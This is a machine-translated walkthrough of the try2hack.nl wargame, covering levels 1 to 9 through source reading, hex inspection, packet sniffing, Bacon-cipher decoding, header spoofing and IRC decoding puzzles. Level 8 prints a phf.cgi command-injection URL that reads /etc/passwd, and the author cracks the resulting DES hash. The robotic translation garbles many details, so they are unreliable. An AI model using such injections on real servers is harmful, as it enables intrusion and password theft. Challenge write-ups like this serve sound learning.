This page has been robot translated, sorry for typos if any. Original content here.

Network shortcuts


A few days ago (June 13, 02), some cake threw me on ICQ url http://www.try2hack.nl/level1.html , they say, check your strength. I admit, every job on this site was in its own way complex, but, at the same time, interesting. To all who did not pass this testing, I strongly recommend to try. Well, however, those who have already tried well-being also did not reach the 10th task, read this article =)
Well, let's begin. I will say once that I will describe the current solutions to the main 9 tasks, I will be detailed only on the complex and interesting ones.

#1.

Elementary. Here's the sour on js password verification:
  <SCRIPT LANGUAGE = "JavaScript">
 function Try (passwd) {
 if (passwd == "hackerzzz") {
 alert ("Alright! On to level 2 ...");
 location.href = "levvel2.html";
 }
 else {
 alert ("The password is incorrect." Please Do not Try Again. ");
 location.href = "http://www.disney.com";
 };};
 }
 </ SCRIPT> 
In the third line, the entered value is checked against the word "hackerzzz", which in this case plays the role of a password.

# 2.

I confess, to my main eye, the task seemed to me difficult. I was wrong =)
Fill a flash drive, open it with a notebook (you can hex-editor) and at the very bottom (addresses 00000440-00000490) we see:
txtUsername ...... Try2Hack.I .... txtPassword ...... NokiaIsGood.I .......... LLeVeLL3.html
Login Try2Hack
NokiaIsGood password
Track. task LLeVeLL3.html

# 3.

Very clever is also an interesting task.
Here is the source js'a:
  <SCRIPT language = "JavaScript">
 pwd = prompt ("Please enter the password for level 3:", "");
 if (pwd == PASSWORD) {
 alert ("Alright! \ nEntering Level 4 ...");
 location.href = CORRECTSITE;
 } else
 {
 alert ("WRONG! \ nBack to disneyland !!!");
 location.href = WRONGSITE;
 }
 PASSWORD = "AbCdE";
 CORRECTSITE = "level4.html";
 WRONGSITE = "http://www.disney.com";
 </ SCRIPT> 
It would seem that the password is "AbCdE", but how can it work if it is determined at the end? However, the PASSWORD variable was already defined at the time of the check, otherwise the interpreter would give an error "PASSWORD: detection is missing". In addition, only after 20 minutes. thoughtfulness, a line sprang into the eye:
<SCRIPT src = "JavaScript"> </ SCRIPT>
I just could not think that "JavaScript" is a file =))) In it, as once, the true values ​​of the variables also lay:
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";

#4.

Picking up the applet, caring attracted the lines at the address 00000A60-00000A80. The applet read the lines from the file * level4 * (in the aftermath it was confirmed). Most likely, it was a password file. Most interestingly, he continued to act on this with my screw. That eat, file * level4 * was either in the internet, or on my computer. And if on mine, in what place? Correctly, either in cookie, or in Temp'ah. After cleaning those, also others, we went to the page with the applet. In the tempo, a couple of files appeared, one of which was level4 [2] .txt.
Content:
5_level_5.html
Try2Hack
AppletsAreEasy
By the way, inside the applet for tearing away the eye was this: "txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d" Heathrow =)
/ * Gr33tz 2 godson * /

#5.

It is suggested to download the file level5.exe. In it, you need to enter a login and password, which are obviously stored in the file itself. Opening it hex'om in the eye has rushed:
http: //www.try2hack.f2s.com/login-level6.html ..... txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d
Addressa: 000019F0-00001A50.
Too easy, I thought. Additionally, the passwords did not fit. Next, a disassembler came to the rescue =):
Login Try2Hack
Password OutOfInspiration
Track. task level-6.html
/ * gr33tz 2 a3oX =) * /

# 6.

Very confusing task. Again, blah blah is proposed to download a program that on your eyes connects to the server also checks your input data for validity. At this time, the creators are honestly warned: "this is not level 5, you can not decompile this exe's".
The sniffer SpyNet came to the rescue. I will not describe how we did Che (we need a separate article), I will lay out only the package that interests us:
  0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST .. SRC .... E.
 0010: 02 40 5F 78 40 00 71 06 14 E0 D5 13 8C 02 C2 57. @ _ x @ .q ........ W
 0020: 6F F2 00 50 04 AE EC 04 FD 8C 1A 9A 11 B0 50 10 o..P .......... P.
 0030: 40 7C AE D3 00 00 48 54 54 50 2F 31 2E 31 20 32 @ | .... HTTP / 1.1 2
 0040: 30 30 20 4F 4B 0D 0A 44 61 74 65 3A 20 53 75 6E 00 OK..Date: Sun
 0050: 2C 20 31 34 20 41 70 72 20 32 30 30 32 20 31 38, 14 Apr 2002 18
 0060: 3A 32 32 3A 35 35 20 47 4D 54 0D 0A 53 65 72 76: 22: 55 GMT..Serv
 0070: 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 61 63 68 er: Apache..Cach
 0080: 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 e-Control: max-a
 0090: 67 65 3D 36 30 34 38 30 30 0D 0A 45 78 70 69 72 ge = 604800..Expir
 00A0: 65 73 3A 20 53 75 6E 2C 20 32 31 20 41 70 72 20 es: Sun, 21 Apr 
 00B0: 32 30 30 32 20 31 38 3A 32 32 3A 35 35 20 47 4D 2002 18:22:55 GM
 00C0: 54 0D 0A 4C 61 73 74 2D 4D 6F 64 69 66 69 65 64 T..Last-Modified
 00D0: 3A 20 57 65 64 2C 20 31 38 20 41 70 72 20 32 30: Wed, 18 Apr 20
 00E0: 30 31 20 31 35 3A 32 38 3A 30 30 20 47 4D 54 0D 01 15:28:00 GMT.
 00F0: 0A 45 54 61 67 3A 20 22 30 2D 63 63 2D 33 61 64 .ETag: "0-cc-3ad
 0100: 64 62 32 38 30 22 0D 0A 41 63 63 65 70 74 2D 52 db280 ".. Accept-R
 0110: 61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 6F anges: bytes..Co
 0120: 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 30 ntent-Length: 20
 0130: 34 0D 0A 4B 65 65 70 2D 41 6C 69 76 65 3A 20 74 4..Keep-Alive: t
 0140: 69 6D 65 6F 75 74 3D 31 35 2C 20 6D 61 78 3D 31 imeout = 15, max = 1
 0150: 30 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 00..Connection: 
 0160: 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E 74 Keep-Alive..Cont
 0170: 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 70 ent-Type: text / p
 0180: 6C 61 69 6E 0D 0A 0D 0A 00 28 45 4E 43 52 59 50 lain ..... (ENCRYP
 0190: 54 49 4F 4E 20 54 59 50 45 29 0D 0A 42 2A 43 2A TION TYPE) .. B * C *
 01A0: 4E 2A 2A 4E 0D 0A 0D 0A 28 55 53 45 52 4E 41 4D N ** N .... (USERNAM
 01B0: 45 29 0D 0A 61 62 61 62 61 20 61 62 62 61 62 20 E) .. ababa abbab 
 01C0: 62 61 61 61 61 20 61 61 61 62 62 0D 0A 0D 0A 28 baaaa aaabb .... (
 01D0: 50 41 53 53 57 4F 52 44 29 0D 0A 61 62 61 62 61 PASSWORD) .. ababa
 01E0: 20 61 61 61 61 61 20 61 62 62 61 61 20 61 62 62 aaaaa abbaa abb
 01F0: 62 61 20 61 61 61 61 61 20 62 61 61 61 61 20 62 ba aaaaa baaaa b
 0200: 61 61 62 61 20 62 61 62 62 61 0D 0A 0D 0A 28 50 aaba babba .... (P
 0210: 41 47 45 29 0D 0A 61 62 61 62 61 20 61 61 62 61 AGE) .. ababa aaba
 0220: 61 20 62 61 61 62 62 20 61 61 62 61 61 20 61 62 a baabb aabaa ab
 0230: 61 62 61 20 62 61 61 61 62 20 61 61 62 61 61 20 aba baaab aabaa 
 0240: 62 61 61 62 62 20 61 61 62 61 61 20 61 62 baabb aabaa ab
Slightly clipped (you try namano copy from SpyNet'a), but the main part (password, login, page) is seen well. It would seem that the lesson is done, but no. All data was encrypted: - /
(USERNAME) .. ababa abbab baaaa aaabb ....
(PASSWORD) .. ababa aaaaa abbaa abbba aaaaa baaaa baaba babba ....
I took John TheRipper'a also started busting ... joke =)) This was Bacon's algorithm. A complete algorithmic algorithm, not even encryption, but coding:
aaaaa = a
aaaab = b
aaaba = c
aaabb = d
etc.
The result of manual decoding was:
Login LORD
Paz LANPARTY
Page LEVELSEVEN.html
Teach computer science, children =)
/ * gr33tz 2 D4rkGr3y;) * /

# 7.

Dan is a capricious pearl script level7.pl. Task: make him believe that:
1) the page from which we came to the site: http://www.microsoft.com/ms.htm
2) we use the Microsoft Internet Explorer 6.72 browser
3) UNIX / LINUX operating system
In general, the task is easy, we just need to generate such an http request, the header of which will contain this information. I.e:
Referer: http://www.microsoft.com/ms.htm
User-agent: MSIE 6.72
But with the axis a little problem. In the header, the field in which you explicitly specify the version of the operating system is not. It is usually pulled out of the User-agent. Hoping that level7.pl acts just like that, we sketched the pearl of the script, which one sent this request:
GET /cgi-bin/level7.pl HTTP / 1.0
Referer: http://www.microsoft.com/ms.htm
User-Agent: MSIE 6.72 (UNIX / LINUX)
Accept: * / *

And opa =)
<A HREF="../Level-8.html"> Level 8 </A>

#8.

Immediately attracted the name of the processing script phf.cgi. I remember a lot of hacking was on his conscience. Spraying on the bug-track, I found a solid:
/cgi-bin/phf.pp?Qalias=x%0a/bin/cat%20/etc/passwd
The answer was:
BuiZe: Bu3kOx4cCMX2U
The password is encrypted with the usual DES'om. JTR'u took 15 minutes to learn pas. What kind of distribution, perhaps, I will not in any way, who needs to - decrypt =)

#9.

On the page with the task the inscription flaunts:
New message for BuiZe:

Level 8 completed!
Go to irc. <*>. Org and join # <*>
There type / msg <*> begin

In other words, the battlefield is transferred to irk. The name of the server, channel, and bot, we concealed for understandable (I hope all) reasons.

#9.

consists of many mini-tasks.
We go to them on the channel # Try2Hack.
Write "/ msg Try2Hack perfect-start"
Well also what blah blah he will give us? but here's what:
-TRY2HACK- Welcome to try2hack level 9! Decode the following lines to continue:
-TRY2HACK- Wbva # gel2unpx.yriry9. Gb trg gur xrl lbh arrq gb qrpbqr gur sbyybjvat yvar:
-TRY2HACK- GTI2MJj5YJ15DxVmERy1rQIZ =
-TRY2HACK-Tbbq yhpx, naq frr lbh ba # gel2unpx.yriry9.
decode yourself ... weakly? well, at that time we will not mock you in any way:
http://www.degraeve.com/cgi-bin/rot13.cgi
here we also deciphered also that blah blah we got:
Join # try2hack.level9. To get the key you need to decode the following line:
TGV2ZWw5LW15QkIzREl1eDVM =
Good luck, and see you on # try2hack.level9.
We are in a panic, too, we do not know. what the ?
TGV2ZWw5LW15QkIzREl1eDVM =
hmm from the main view it seemed to me that everything was complicated, but we remembered that the mirkovski scripts were being scribbled / echo $ decode (TGV2ZWw5LW15QkIzREl1eDVM =, m) also we get Level9-myBB3DIux5L. We will get into this, we go to the channel,
-LEVEL9-XXX- Welcome, I am try2hack Level9! Decode the following lines to proceed:
-LEVEL9-XXX- 010011100110100101100011011001010010000001101010011011 ...
old good-natured binary ... if you do not want to decode into the manual well
http://www.nickciske.com/binary/index.php
we get "Nice job. Now type '/ msg TRY2HACK showbug' to see the bug"
well, the / msg TRY2HACK showbug is also shown to us by a bug of that
-TRY2HACK- ovaq pgpe - CVAT pgpe: cvatercyl
-TRY2HACK-cebp pgpe: cvatercyl {avpx hubfg unaq qrfg xrl net} {
-TRY2HACK- frg qhe [rkce [havkgvzr] - $ net]
-TRY2HACK- chgfrei "ABGVPR $ avpx: Lbhe cvat ercyl gbbx $ qhe frpbaqf"}
Oooh, no, it's backed up again. Well, we'll use the linker again above, who forgot%) ... we decrypted .... And here's a bug ... we also sat down on this room if anyone makes a skin soap on neon@balticum-tv.lt .
For the solution of the 9th task, thanks NeoN'a =)

Author: D4rkGr3y


The material is published with the permission of DHGROUP (http://www.dhgroup.org)